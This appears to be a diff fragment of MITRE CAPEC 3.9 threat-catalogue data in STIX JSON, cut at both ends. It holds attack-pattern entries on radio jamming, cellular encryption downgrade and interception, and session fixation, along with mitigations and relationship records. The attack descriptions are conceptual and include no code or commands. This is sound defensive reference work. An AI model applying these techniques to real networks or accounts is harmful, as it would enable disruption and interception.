"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c4ceb80d-d66e-40ed-8041-badec381e5b7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8f274c3-95ed-4968-afdc-6a8a87a6fb19", + "spec_version": "2.1", + "target_ref": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5041416c-f169-4ccd-a849-d3df74a189c9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93ed0e66-1693-44b2-b416-bee8db1ad4c2", + "spec_version": "2.1", + "target_ref": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--31e79d3e-c3fa-47e2-9e66-4fec40ce3d44", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f17a2576-00f1-49a8-b554-5ec205ca54a2", + "spec_version": "2.1", + "target_ref": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--46e1f0c5-b178-4459-96f1-6522f4e3e9ab", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7c813ade-2f68-46ad-b0ff-b3aa1d6f16d0", + "spec_version": "2.1", + "target_ref": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c5bcb0cc-37a1-46f8-8b46-cd63f87de636", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8e39cc3a-64c4-488e-84a3-e2613bdb1254", + "spec_version": "2.1", + "target_ref": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3123edea-0c54-4b71-be21-4d83cea9c940", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9d97f821-8b04-46bf-a725-33db09a739da", + "spec_version": "2.1", + "target_ref": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5589acda-9084-4d60-a9f7-5bb13e6d9196", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--36387909-c46a-4d0f-8954-bbc4c954c9a9", + "spec_version": "2.1", + "target_ref": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ba6343af-b630-429a-b10a-f9e9ac7ff6a2", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ab6c4df3-7bf9-4fdd-8c2a-9055c0aea441", + "spec_version": "2.1", + "target_ref": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses radio noise or signals in an attempt to disrupt communications. By intentionally overwhelming system resources with illegitimate traffic, service is denied to the legitimate traffic of authorized users.", + "external_references": [ + { + "external_id": "CAPEC-601", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/601.html" + } + ], + "id": "attack-pattern--7534fc4c-f683-4918-8f62-005e0402d18a", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Jamming", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--576968ad-12ef-46d8-bb10-63f496bcaccb" + ], + "x_capec_consequences": { + "Availability": [ + "Other (The jamming of equipment denies the availability of functioning communications services.)" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--7a6e0e5c-f18e-4612-aaa6-68bdeb378b31", + "attack-pattern--bac3d2d8-864c-4519-8e16-6d4e4fee6031", + "attack-pattern--17593c9a-d8a0-4ef3-8da1-9d948426bbb8" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated.", + "external_references": [ + { + "external_id": "CAPEC-602", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/602.html" + } + ], + "id": "attack-pattern--2fb09678-092a-490d-b2da-fff20a696219", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Degradation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary blocks the delivery of an important system resource causing the system to fail or stop working.", + "external_references": [ + { + "external_id": "CAPEC-603", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/603.html" + } + ], + "id": "attack-pattern--ec0de204-6b66-4c4f-a401-21afa72f3941", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Blockage", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--576968ad-12ef-46d8-bb10-63f496bcaccb" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Blocking a resource from functional operation denies its availability to authorized users.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--5a002211-15f2-487f-8a5d-b09150ac1138", + "attack-pattern--5c216971-78b5-4ac1-9cbe-f46fe1c632d1", + "attack-pattern--807e5b36-9da9-4be8-9f6e-5d8c7258cff5" + ], + "x_capec_prerequisites": [ + "This attack pattern requires knowledge of where important system resources are logically located as well as how they operate." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker actively transmits on the Wi-Fi channel to prevent users from transmitting or receiving data from the targeted Wi-Fi network. There are several known techniques to perform this attack – for example: the attacker may flood the Wi-Fi access point (e.g. the retransmission device) with deauthentication frames. Another method is to transmit high levels of noise on the RF band used by the Wi-Fi network.", + "external_references": [ + { + "external_id": "CAPEC-604", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/604.html" + } + ], + "id": "attack-pattern--bac3d2d8-864c-4519-8e16-6d4e4fee6031", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Wi-Fi Jamming", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--7534fc4c-f683-4918-8f62-005e0402d18a" + ], + "x_capec_consequences": { + "Availability": [ + "Other (A successful attack will deny the availability of the Wi-fi network to authorized users.)", + "Resource Consumption (The attacker's goal is to prevent users from accessing the wireless network. Denying connectivity to the wireless network prevents the user from being able to transmit or receive any data, which also prevents VOIP calls, however this attack poses no threat to data confidentiality.)" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Lack of anti-jam features in 802.11", + "Lack of authentication on deauthentication/disassociation packets on 802.11-based networks" + ], + "x_capec_skills_required": { + "Low": "This attack can be performed by low capability attackers with freely available tools. Commercial tools are also available that can target select networks or all WiFi networks within a range of several miles." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Countermeasures have been proposed for both disassociation flooding and RF jamming, however these countermeasures are not standardized and would need to be supported on both the retransmission device and the handset in order to be effective. Commercial products are not currently available that support jamming countermeasures for Wi-Fi.", + "id": "course-of-action--60934a01-b877-4253-9984-be3bf3629ab7", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-604-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--52128fa2-afdb-4097-bdd6-8f3b3095fc56", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--60934a01-b877-4253-9984-be3bf3629ab7", + "spec_version": "2.1", + "target_ref": "attack-pattern--bac3d2d8-864c-4519-8e16-6d4e4fee6031", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker actively transmits signals to overpower and disrupt the communication between a cellular user device and a cell tower. Several existing techniques are known in the open literature for this attack for 2G, 3G, and 4G LTE cellular technology. For example, some attacks target cell towers by overwhelming them with false status messages, while others introduce high levels of noise on signaling channels.", + "external_references": [ + { + "external_id": "CAPEC-605", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/605.html" + } + ], + "id": "attack-pattern--17593c9a-d8a0-4ef3-8da1-9d948426bbb8", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Cellular Jamming", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--7534fc4c-f683-4918-8f62-005e0402d18a" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (The attacker's goal is to prevent users from accessing the cellular network. Denying connectivity to the cellular network prevents the user from being able to transmit or receive any data, which also prevents VOIP calls, however this attack poses no threat to data confidentiality.)" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_prerequisites": [ + "Lack of anti-jam features in cellular technology (2G, 3G, 4G, LTE)" + ], + "x_capec_skills_required": { + "Low": "This attack can be performed by low capability attackers with commercially available tools." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Mitigating this attack requires countermeasures employed on both the retransmission device as well as on the cell tower. Therefore, any system that relies on existing commercial cell towards will likely be vulnerable to this attack. By using a private cellular LTE network (i.e., a custom cell tower), jamming countermeasures could be developed and employed.", + "id": "course-of-action--5afa1aa9-7585-4544-991c-9152f9024393", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-605-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--10c74aec-704c-47cf-ae7a-7f2c590c4166", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5afa1aa9-7585-4544-991c-9152f9024393", + "spec_version": "2.1", + "target_ref": "attack-pattern--17593c9a-d8a0-4ef3-8da1-9d948426bbb8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker, with control of a Cellular Rogue Base Station or through cooperation with a Malicious Mobile Network Operator can force the mobile device (e.g., the retransmission device) to use no encryption (A5/0 mode) or to use easily breakable encryption (A5/1 or A5/2 mode).", + "external_references": [ + { + "external_id": "CAPEC-606", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/606.html" + }, + { + "external_id": "CWE-757", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/757.html" + } + ], + "id": "attack-pattern--4480b2e7-bdb7-45fe-896b-dd895fbe3680", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Weakening of Cellular Encryption", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e680008c-a642-4feb-a1c4-a29b54eb284a" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other (Tracking, Network Reconnaissance)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "Cellular devices that allow negotiating security modes to facilitate backwards compatibility and roaming on legacy networks." + ], + "x_capec_skills_required": { + "Medium": "Adversaries can purchase and implement rogue BTS stations at a cost effective rate, and can push a mobile device to downgrade to a non-secure cellular protocol like 2G over GSM or CDMA." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use of hardened baseband firmware on retransmission device to detect and prevent the use of weak cellular encryption.", + "id": "course-of-action--a04126f1-f0a0-4aa1-99e0-711b2d3e96d7", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-606-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9467c544-8557-428f-9ebe-8a1fcc52a7f9", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a04126f1-f0a0-4aa1-99e0-711b2d3e96d7", + "spec_version": "2.1", + "target_ref": "attack-pattern--4480b2e7-bdb7-45fe-896b-dd895fbe3680", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor cellular RF interface to detect the usage of weaker-than-expected cellular encryption.", + "id": "course-of-action--f0d5b9cf-bcc9-4462-a783-d4e7f17ceada", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-606-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--913cda1e-62b6-4e54-9557-3e3626768a59", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f0d5b9cf-bcc9-4462-a783-d4e7f17ceada", + "spec_version": "2.1", + "target_ref": "attack-pattern--4480b2e7-bdb7-45fe-896b-dd895fbe3680", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker obstructs the interactions between system components. By interrupting or disabling these interactions, an adversary can often force the system into a degraded state or cause the system to stop working as intended. This can cause the system components to be unavailable until the obstruction mitigated.", + "external_references": [ + { + "external_id": "CAPEC-607", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/607.html" + } + ], + "id": "attack-pattern--576968ad-12ef-46d8-bb10-63f496bcaccb", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Obstruction", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_follow_refs": [ + "attack-pattern--61546d1a-d720-4609-89ca-12039268d502" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Communications", + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--475af086-5223-4210-910a-5217445c0c23", + "attack-pattern--795c323b-cae6-4846-99f1-dad3fe0ab8e8", + "attack-pattern--7534fc4c-f683-4918-8f62-005e0402d18a", + "attack-pattern--ec0de204-6b66-4c4f-a401-21afa72f3941" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The use of cryptanalytic techniques to derive cryptographic keys or otherwise effectively defeat cellular encryption to reveal traffic content. Some cellular encryption algorithms such as A5/1 and A5/2 (specified for GSM use) are known to be vulnerable to such attacks and commercial tools are available to execute these attacks and decrypt mobile phone conversations in real-time. Newer encryption algorithms in use by UMTS and LTE are stronger and currently believed to be less vulnerable to these types of attacks. Note, however, that an attacker with a Cellular Rogue Base Station can force the use of weak cellular encryption even by newer mobile devices.", + "external_references": [ + { + "external_id": "CAPEC-608", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/608.html" + }, + { + "external_id": "CWE-327", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/327.html" + } + ], + "id": "attack-pattern--9dded599-dd66-4a4c-8f17-6afb81c234f8", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Cryptanalysis of Cellular Encryption", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--f1336271-5f27-40de-a61b-aba6572d120f" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other (Reveals IMSI and IMEI for tracking of retransmission device and enables further follow-on attacks by revealing black network control messages. (e.g., revealing IP addresses of enterprise servers for VOIP connectivity))" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_skills_required": { + "Medium": "Adversaries can rent commercial supercomputer time globally to conduct cryptanalysis on encrypted data captured from mobile devices. Foreign governments have their own cryptanalysis technology and capabilities. Commercial cellular standards for encryption (GSM and CDMA) are also subject to adversary cryptanalysis." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--75de4a67-623a-4c5a-a757-9f143a48b1d9", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a04126f1-f0a0-4aa1-99e0-711b2d3e96d7", + "spec_version": "2.1", + "target_ref": "attack-pattern--9dded599-dd66-4a4c-8f17-6afb81c234f8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--56a59dd2-1721-46b2-84d7-cdcd15e06ca7", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f0d5b9cf-bcc9-4462-a783-d4e7f17ceada", + "spec_version": "2.1", + "target_ref": "attack-pattern--9dded599-dd66-4a4c-8f17-6afb81c234f8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Cellular traffic for voice and data from mobile devices and retransmission devices can be intercepted via numerous methods. Malicious actors can deploy their own cellular tower equipment and intercept cellular traffic surreptitiously. Additionally, government agencies of adversaries and malicious actors can intercept cellular traffic via the telecommunications backbone over which mobile traffic is transmitted.", + "external_references": [ + { + "external_id": "CAPEC-609", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/609.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "description": "Multi-Factor Authentication Interception", + "external_id": "T1111", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1111" + } + ], + "id": "attack-pattern--c7f0c73b-fe94-49c9-89bb-a3ec4441e4ee", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Cellular Traffic Intercept", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--bdcdc784-d891-4ca8-847b-38ddca37a6ec" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Capture all cellular and RF traffic from mobile and retransmission devices. Move bulk traffic capture to storage area for cryptanalysis of encrypted traffic, and telemetry analysis of non-encrypted data. (packet headers, cellular power data, signal strength, etc.))" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_skills_required": { + "Medium": "Adversaries can purchase hardware and software solutions, or create their own solutions, to capture/intercept cellular radio traffic. The cost of a basic Base Transceiver Station (BTS) to broadcast to local mobile cellular radios in mobile devices has dropped to very affordable costs. The ability of commercial cellular providers to monitor for \"rogue\" BTS stations is poor in many areas and it is assumed that \"rogue\" BTS stations exist in urban areas." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Encryption of all data packets emanating from the smartphone to a retransmission device via two encrypted tunnels with Suite B cryptography, all the way to the VPN gateway at the datacenter.", + "id": "course-of-action--c7b42679-6d45-41dc-b732-6310e2569805", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-609-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c4813a8a-b41c-4718-8323-0bdb7fabf19c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c7b42679-6d45-41dc-b732-6310e2569805", + "spec_version": "2.1", + "target_ref": "attack-pattern--c7f0c73b-fe94-49c9-89bb-a3ec4441e4ee", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The attacker induces a client to establish a session with the target software using a session identifier provided by the attacker. Once the user successfully authenticates to the target software, the attacker uses the (now privileged) session identifier in their own transactions. This attack leverages the fact that the target software either relies on client-generated session identifiers or maintains the same session identifiers after privilege elevation.", + "external_references": [ + { + "external_id": "CAPEC-61", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/61.html" + }, + { + "external_id": "CWE-384", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/384.html" + }, + { + "external_id": "CWE-664", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/664.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "description": "Session Fixation", + "external_id": "37", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Session-Fixation" + }, + { + "description": "Session fixation", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Session_fixation" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-601", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/03-Testing_for_Session_Fixation.html" + } + ], + "id": "attack-pattern--c1e3e934-5b43-4af9-b92b-9a4837a90c14", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Session Fixation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--414d0884-4f46-4a51-b4ea-72125c7f5f9e" + ], + "x_capec_child_of_refs": [ + "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Consider a banking application that issues a session identifier in the URL to a user before login, and uses the same identifier to identify the customer following successful authentication. An attacker can easily leverage session fixation to access a victim's account by having the victim click on a forged link that contains a valid session identifier from a trapped session setup by the attacker. Once the victim is authenticated, the attacker can take over the session and continue with the same levels of privilege as the victim.", + "An attacker can hijack user sessions, bypass authentication controls and possibly gain administrative privilege by fixating the session of a user authenticating to the Management Console on certain versions of Macromedia JRun 4.0. This can be achieved by setting the session identifier in the user's browser and having the user authenticate to the Management Console. Session fixation is possible since the application server does not regenerate session identifiers when there is a change in the privilege levels. See also: CVE-2004-2182" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Setup the Attack: Setup a session: The attacker has to setup a trap session that provides a valid session identifier, or select an arbitrary identifier, depending on the mechanism employed by the application. A trap session is a dummy session established with the application by the attacker and is used solely for the purpose of obtaining valid session identifiers. The attacker may also be required to periodically refresh the trap session in order to obtain valid session identifiers.

    2. Techniques
    The attacker chooses a predefined identifier that they know.
    The attacker creates a trap session for the victim.

Experiment

